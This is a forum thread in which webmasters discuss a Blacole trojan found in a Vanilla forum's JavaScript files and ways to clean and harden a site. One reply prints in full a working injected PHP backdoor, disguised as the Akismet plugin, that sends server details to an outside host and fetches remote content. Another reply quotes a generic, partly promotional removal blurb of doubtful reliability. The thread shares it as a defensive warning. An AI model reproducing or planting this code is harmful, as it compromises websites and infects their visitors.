Infected forum Trojan.JS.Blacole.Gen

avantime4mike

Running Vanilla ver 2.0.18.8

I've recently had a problem with a Trojan worm infecting my forum. My anti virus program picked up the following five attacks as I navigated to a forum page:-

Infected object: www.mysite.com/forum/js/library/jquery.livequery.js?v=2.0.18.8
Malware: Trojan.JS.Blacole.Gen
Infected process: [4896] C:\Program Files (x86)\Internet Explorer\iexplore.exe

Infected object: www.mysite.com/forum/js/library/jquery.form.js?v=2.0.18.8
Malware: Trojan.JS.Blacole.Gen
Infected process: [4896] C:\Program Files (x86)\Internet Explorer\iexplore.exe

Infected object: www.mysite.com/forum/js/library/jquery.js?v=2.0.18.8
Malware: Trojan.JS.Blacole.Gen
Infected process: [4896] C:\Program Files (x86)\Internet Explorer\iexplore.exe

Infected object: www.mysite.com/forum/js/library/jquery.gardenhandleajaxform.js?v=2.0.18.8
Malware: Trojan.JS.Blacole.Gen
Infected process: [4896] C:\Program Files (x86)\Internet Explorer\iexplore.exe

Infected object: www.mysite.com/forum/js/library/jquery.popup.js?v=2.0.18.8
Malware: Trojan.JS.Blacole.Gen
Infected process: [4896] C:\Program Files (x86)\Internet Explorer\iexplore.exe

I appear to have removed the infection by replacing the whole www.mysite.com/forum/js folder with a previous backup.

Does anyone have any suggestions as to how the site became infected and how I can prevent this happening again.

hgtonight

Step one is to run the latest stable version which is 2.0.18.10.

peregrine

@hgtonight said:
Step one is to run the latest stable version which is 2.0.18.10.

hgtonight is correct,

anyone reads anything in this forum -

should put a hold on questions about this and that theme or plugin

until they have added the security fixes.

http://vanillaforums.org/discussion/25668/dec-2013-security-update-2-0-18-10-and-2-1b2

vrijvlinder

Check your config.php see if there is anything there that should not be. Remove this from your computer.

What is the trojan.js.blacole.gen?

trojan.js.blacole.gen is a current malware virus from the notorious Trojan horse family, which can terminate program running on the infected computer. This vicious Trojan is extremely difficult to remove via a normal anti-virus. It invades into the computer system via malicious websites, junk mails and even when you download mail attachments which are malicious nature. Once it is through to the PC, it copies itself to the start up code of the system in order to get started automatically whenever you log into the computer system.

In general, trojan.js.blacole.gen virus will change system registry settings which enables itself to be activated automatically every time when you start the infected computer. It can exploit system vulnerability, which slows down the computer considerably. It is very annoying to spend a long long time on performing any task on the computer. Moreover, this Trojan is able to implant other malware and spyware into the infected computer, which will further destroy the system and even lead to system crash. What is worse, it is active in the background to facilitate cyber criminals to invade your computer. Your online traces and personal information may be recorded and you have no awareness of that. Thus, it is highly recommended to remove it as quickly as possible.

How trojan.js.blacole.gen Enters Windows PC

Sometimes a situation may arise when you think that How trojan.js.blacole.gen threat enters into your system in-spite of a powerful antivirus tool in your system? Actually it is very harmful threat specifically developed by cyber crooks which can even damage your antivirus software. This malware is technically designed so that it can easily penetrates your system without any prior notice and successfully hampers your all system function. It finds gateway to enter your system by following means:

when you visit some compromised websites.
Downloading shareware and freeware applications.
When open spam email attachments.
Clicking on unsafe links.
By use of removable infected storage media like dvd, pen drive, etc
When system is attacked by network infections.
Performing some other risky work online.

How to Remove trojan.js.blacole.gen

The first step in removing trojan.js.blacole.gen is to disable it and stop it from running. This will prevent the virus from blocking any attempt to have it deleted or removed. Following this, you need to remove all applications and programs the virus uses for running. This can be accomplished in two ways. The more tedious and time-consuming approach is manual removal. You need to have some knowledge in computers to do this. Bear in mind that you need to know how get your computer to Safe Mode when using this method. It needs to be noted also that to ensure that the virus is effectively contained, you need to rid any folders or files which may contain the virus. An example would be hidden files, which are files installed by trojan.js.blacole.gen. Their main job is to reintroduce the virus after it has been removed.

The faster way of removing the virus is through the use of malware removal tools, which are programs that are designed to rid of viruses and other similar threats. One such application is Frontline Rogue Remover. It is considered to be the best removal tool for this virus because it first shows you how to stop the virus from loading, and will then remove it for good.

Avoid internet Explorer

peregrine

I was going to suggest - that anyone infected with a trojan or virus.

should google it.

https://www.google.com/search?q=Trojan.JS.Blacole.Gen

and go to reputable security sites in the links provided.

I can't vouch for this - but the info looks interesting and may provide other insights.

http://goarticles.com/article/Remove-Trojan-Js-Blacole-Gen-How-to-Remove-Trojan-Js-Blacole-Gen-the-Easy-Way/8015793/

also darkreading is an excellent site

http://www.darkreading.com/sitesearch?sort=publishDate+desc&queryText=blacole

avantime4mike

Thanks everyone who responded, I had used Google to get info on this virus and how to remove it from a pc but I couldn't find any reference to cleaning my site or how it might have got infected. I thought posting here might help others remove it quickly as I did by overwriting the infected folder but maybe it's so obvious it didn't need saying.

I would still like to know how it got infected in the first place though.

Should I be complaining to my host?

peregrine

its great you posted issue. it will possible give a wake up call to those who haven't upgraded as mentioned in announcement on the forum.

I would still like to know how it got infected in the first place though.

you had security issues because you were using 2.0.18.8

a bot or someone could have injected it. finding who or when, without incremental backups and looking at logs - you can't figure who or when. who's to say if that was the problem.
but 5 of the js files were infected. so a form or popup code or ajax could have been the entry point.

vrijvlinder

Should I be complaining to my host?

They will sell you something I am sure... Like site lock . They have or are supposed to have antivirus protection and they should have shut you down until you fixed it if they could detect the infection. It is even possible other domains they host got infected too.

Change your ftp password asap.

I would still like to know how it got infected in the first place though.

Like peregrine said , someone could inadvertently uploaded something, however this virus/trojan appears to upload itself . So it came from the computer of someone who has ftp access to your server and files.

Those files are not supposed to be writable. This is an example of what can happen if you 777 all your files.

x00

They will sell you something I am sure...

general rule of thumb is the cheaper, the more high volume and shared the host is the less the person on the end of the phone knows what they are talking about, the more they are reading from a sales script.

@avantime4mike what is more important then the Trojan itself is how it go on your server.

To explain better you server may be compromised in some way, in which file are able to be written to through remote action.

The point of this attack is to use you site as a platform to infect other people's computers and so forth and also possibly deliver spam directly.

The vast majority of infection have the purpose of Spam, if not they are often to test the capability of the technique in the wild, which would be later used for Spam if it works.

If you are not a high value target, or don't support financial transactions, you would not be targeted specifically for that normally.

Aside from firewall and antivirus software, it is important to get the basics right understanding you setup, preventing other users such as the process user of the script writing to file it shouldn't do. Managing servers and web applications is not without learning curve an many people underestimate the skills they need. Understanding the basics of file permission and ownership is really important.

Another problem is if your computer is infected, or any of other admins, your site doesn't have to be weak server, becuase the attack can piggyback your/their communication as 'legit'.

This is why home security for anyone who has privileged access is paramount. This can be the most frustrating even for professionals becuase they haven't done anything particularly wrong with the server. Regular scans and update at for anyone/any computer who has privileged access is important.

Other than that, you can implement some early detection software, be be aware you get a lot of false positives. It is s tool you will need to be able to interpret it. You will hone the settings so it does not drive you crazy, but is still effective.

Use the most secure mean of connection to your server. generally speaking you wan to use ssh/scp/sftp.

You want to disable other methods such as unsecured ftp,or web based file management.

You will often fine software will complain a lot that there isn't write access, but being conservative is no bad thing.

Make sure you the web frameworks you have have the latest security updates.

bobfelstead

I recently suffered an attack from this particular virus. It basically took out my whole network and uploaded itself to my web hosting too without my knowledge!

After re-installing windows to all PC's, virus and malware checking, I thought that that would be all. However, when visiting the home page of my website I received the show only secure content dialogue which was strange as 2 weeks earlier I'd completed an upgrade to https: Investigation followed and here's what I found and what you should be looking for:

1) The virus normally affects index.php or .html, but will spread throughout a website subdirectories into any file with name index.*. It will include in the source something like:


<?php //This is your files PHP********* $subject="Website enquiry"; $headers = 'MIME-Version: 1.0' . "\r\n"; $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; $headers .= "From:" . $_POST["email"] . "\r\n"; $message=" Name: $name <br>
Email-Id: $email

Message: $query

Remote server: $_SERVER[REMOTE_ADDR] "; mail($to,$subject,$message,$headers); } ?>
//This is the injected code *************************
<?php #dad69d# /** * @package Akismet */ /* Plugin Name: Akismet Plugin URI: http://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) Sign up for an Akismet API key, and 3) Go to your Akismet configuration page, and save your API key. Version: 3.0.0 Author: Automattic Author URI: http://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ if( empty( $nvsqb ) ) { if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match( "/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i", $_SERVER['HTTP_USER_AGENT'] ) ) { } else { error_reporting( 0 ); @ini_set( 'display_errors', 0 ); if( !function_exists( '__url_get_contents' ) ) { function __url_get_contents( $remote_url, $timeout ) { if( function_exists( 'curl_exec' ) ) { $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $remote_url ); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout ); curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds $_url_get_contents_data = curl_exec( $ch ); curl_close( $ch ); } elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) { $ctx = @stream_context_create( array( 'http' => array( 'timeout' => $timeout, ) ) ); $_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx ); } elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) { $handle = @fopen( $remote_url, "r" ); $_url_get_contents_data = @stream_get_contents( $handle ); } else { $_url_get_contents_data = __file_get_url_contents( $remote_url ); } return $_url_get_contents_data; } } if( !function_exists( '__file_get_url_contents' ) ) { function __file_get_url_contents( $remote_url ) { if( preg_match( '/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i', $remote_url, $matches ) ) { $protocol = strtolower( $matches[1] ); $host = $matches[2]; $path = $matches[3]; } else { // Bad remote_url-format return false; } if( $protocol == "http" ) { $socket = @fsockopen( $host, 80, $errno, $errstr, $timeout ); } else { // Bad protocol return false; } if( !$socket ) { // Error creating socket return false; } $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n"; $len_written = @fwrite( $socket, $request ); if( $len_written === false || $len_written != strlen( $request ) ) { // Error sending request return false; } $response = ""; while( !@feof( $socket ) && ( $buf = @fread( $socket, 4096 ) ) !== false ) { $response .= $buf; } if( $buf === false ) { // Error reading response return false; } $end_of_header = strpos( $response, "\r\n\r\n" ); return substr( $response, $end_of_header + 4 ); } } $nvsqb['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME']; $nvsqb['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME']; $nvsqb['PHP_SELF'] = $_SERVER['PHP_SELF']; $nvsqb['HTTP_HOST'] = $_SERVER['HTTP_HOST']; $nvsqb['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS']; $nvsqb['SERVER_NAME'] = $_SERVER['SERVER_NAME']; $nvsqb['SERVER_ADDR'] = $_SERVER['SERVER_ADDR']; $nvsqb['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN']; $nvsqb = __url_get_contents( "http://s202356987.online.de/www/hp4xqfhr.php" . "?fid=108865&info=" . http_build_query( $nvsqb ) . "&no=1&allow=1", 2 ); $nvsqb = trim( $nvsqb ); if( $nvsqb !== 'false' ) { echo ""; } } } #/dad69d# ?>


and this will be hidden within an existing php coded section, so check carefully.

2) It will also infect a few important php files in Wordpress, noteably the header file where it will disguise itself as the Askimet plugin! So the firest thjing that you'll see is as above.

If you have Askimet turned on turn it off and check your code and remove anything between the opening <?php of the malicious code and the closing ?> as well as the open and closestatements.

The fake Askimet installation will appear close to the head of header.php, about 20 lines down.

3) The next step is to check all your subdirectories for unknown files. The virus is often found within js directories, look for thr6ngby.php or xcgphrzm.php and any another similarly named file within the subdirectory system. These two files not only infected my website, but were spread to website visitors. They crucially also return all your login details plus a copy of an email sent from the website.

The simple rule is - "If you don't know what the file is, then it's probably the virus. Delete the file!"

4) For every javascript and jQuery file you have on your web hosting (and I do mean every), regardless of subdirectory, replace all of them with a freshly downloaded copy of that file. Delete the file first, then upload the new file to your server. DON'T MISS ANY!

5) Final check, do not reinstate your website until you've checked that it's virus free, otherwise your simply spreading this virus around.

I renamed index.php to index1.php and visited my website. For each website page I allowed time for it to render and cache, plus time for the Antivirus on my machine to scan the page.

Next, I then navigated through each and every webpage, using the same method that I used for the home page. Once complete, I reinstated the index.php page for business as usual.

It's loads of work to do this, but worth the effort. By the way, the file backups of my website which were stored locally were also corrupt! I now upload backups to Dropbox and I suggest that you arrange something similar for important stuff.

6) Finally, as mentioned in another post, change your ftp password and any others for emails, bank accounts etc, that you may have had stored on your machine.

x00

@bobfelstead are you using vanilla or just warning people?

Really you are better off with a clean installation, when clean copies of themes and plugin. You can take a dump of the database first, back up any file based configs, locales, not executable files.

There are similar such examples where the code is deliberately obscured, through encoding. So it is even harder to search for.

Deleting random files could break the framework, and you may not solve the issue.

Also the virus, and the payload can be two different things. So replacing the file may not solve the problem permanently until you stop the source of infection (often yourself).

bobfelstead

I don't use Vanilla, I'm just alerting people to the issue and what to look out for on their webhost.

peregrine

@bobfelstead said:
I don't use Vanilla, I'm just alerting people to the issue and what to look out for on their webhost.

Thanks for the tip. However ....

@x00's solution is better. Clear you local pc of any viruses and then follow @x00's instructions.

Have you posted this on every web forum and web blog as well.